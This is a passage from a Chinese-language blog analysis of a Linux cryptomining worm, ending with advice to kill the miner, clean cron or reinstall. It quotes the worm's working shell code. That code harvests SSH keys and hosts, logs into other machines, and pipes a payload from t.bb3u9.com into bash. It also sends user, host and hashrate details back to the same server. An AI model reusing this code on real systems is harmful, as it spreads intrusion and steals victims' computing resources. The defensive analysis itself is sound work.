        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" $file/.ssh/known_hosts); do echo exit |nc -w 1 -n -v $h 65529 && ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &' & done
        fi
    fi
done

这份脚本,还会病毒式的传播。localgo函数,通过从你的ps进程,history文件,还有hosts配置,拿到用户列表、主机列表端口、rsa密钥等,就可以批量的去尝试登录并传播这份脚本。当然,上面的xr程序会监听65529的端口,如果判断主机已经中招了,就不再继续探测。

能用65529这个端口,本身就够骚气的了,有几台机器能够达到上限65535呢?

localgo() {
  i=0
  for user in $userlistdo
    for host in $hostlistdo
      for key in $keylistdo
        for sshp in $sshportsdo
          i=$((i+1))
          if [ "${i}" -eq "20" ]; then
            sleep 20
            ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
            i=0
          fi
          #Wait 20 seconds after every 20 attempts and clean up hanging processes
          chmod +r $key
          chmod 400 $key
          echo "$user@$host $key $sshp"
          echo exit |nc -w 1 -n -v $host 65529 &&  ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`||wget -q -O- http://t.bb3u9.com/ln/core.png?sshcopy*`whoami`*`hostname`)|bash >/dev/null 2>&1 &"
        done
      done
    done
  done
}

最后,脚本还不忘汇报一下,形成完美的闭环。

reurl=http://t.bb3u9.com/ln/report.asp?*`whoami`*`hostname`*${guid}*${isdocker}*${pyver}*${isxrfile}*${hashrate}*${mip}
(curl -fsSL $reurl||wget -q -O- $reurl)|bash

4. End

如果你发现你的机器不明原因发热,务必排查一下有没有挖矿程序。虽然你的服务器摆在那里也没什么用,但用着你的电费,收益却给别人,相信你一定会嫉妒的要命。那么别犹豫,kill -9送给它,别忘了清理cron。

重装是我们的秘密武器,仅次于重启。嫌麻烦的话,就这么干吧!

– EOF –

转自:https://mp.weixin.qq.com/s/oo5z7XqPBp9ZdNx8qsYkaA